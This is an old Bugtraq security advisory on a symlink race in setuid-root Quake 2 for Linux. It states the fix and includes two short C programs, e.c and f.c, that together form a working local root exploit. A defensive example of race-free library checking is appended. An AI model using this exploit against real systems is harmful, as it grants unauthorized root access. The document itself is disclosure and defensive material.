List: bugtraq
Subject: Quake 2 Linux 3.13 - ref_root.so still works
From: kevingeo () CRUZIO ! COM
Date: 1998-02-25 13:49:10
Vulnerable:
Everyone who followed the installation instructions and made Quake2 setuid
root.
Solution:
chmod u-s quake2.
Exploit:
In version 3.13, Quake2 tries to protect itself by checking the permissions
of a library before loading it. This just introduces a race condition.
Simply find a file that is owned by root and has 0700 permissions, call
ref_root.so ref_root.real.so, run e.c (./e /usr/games/quake2/ref_soft.so &,
for example) in background, and then run f.c. You'll have a root shell after
a few minutes.
e.c:
#include <unistd.h>

void main(int argc, char **argv) {
    while(1) {
        unlink("ref_root.so");
        symlink(argv[1],"ref_root.so");
        unlink("ref_root.so");
        symlink("ref_root.real.so","ref_root.so");
    }
}
f.c:
#include <stdlib.h>

void main() {
    while (1) {
        system("/usr/games/quake/quake2 +set vid_ref root");
    }
}
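
Added example, not part of the original post and not Quake2's code: the race described above exists because the permission check and the load each resolve the file name separately, so a check that avoids it must open the file once and validate the opened descriptor. The function name open_trusted_lib, the self-check and the file names it creates are hypothetical.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open `path` once and validate the opened object itself, not the name.
 * Returns a descriptor on success, -1 on rejection. */
int open_trusted_lib(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;               /* missing, or final component is a symlink */
    if (fstat(fd, &st) != 0 ||   /* fstat: metadata of the inode we hold */
        !S_ISREG(st.st_mode) ||
        st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }
    return fd;  /* caller must load from this fd, never reopen by name */
}

/* Constructed self-check in a private temp dir: returns 0 if a regular file
 * is accepted and a symlink or a file writable by others is rejected. */
int selfcheck(void)
{
    char dir[] = "/tmp/tocXXXXXX", lib[64], lnk[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(lib, sizeof lib, "%s/ref_demo.so", dir);
    snprintf(lnk, sizeof lnk, "%s/ref_link.so", dir);
    int fd = open(lib, O_CREAT | O_WRONLY, 0700);
    if (fd < 0) return -1;
    close(fd);
    if (symlink(lib, lnk) != 0) return -1;

    int ok = open_trusted_lib(lib, geteuid());
    int via_link = open_trusted_lib(lnk, geteuid());
    chmod(lib, 0702);                       /* make it writable by others */
    int loose = open_trusted_lib(lib, geteuid());
    int rc = (ok >= 0 && via_link < 0 && loose < 0) ? 0 : 1;
    if (ok >= 0) close(ok);
    unlink(lnk); unlink(lib); rmdir(dir);
    return rc;
}

int main(void) { return selfcheck(); }
```

The check only helps if the code that follows reads from the returned descriptor; checking the descriptor and then loading by path reopens the same window.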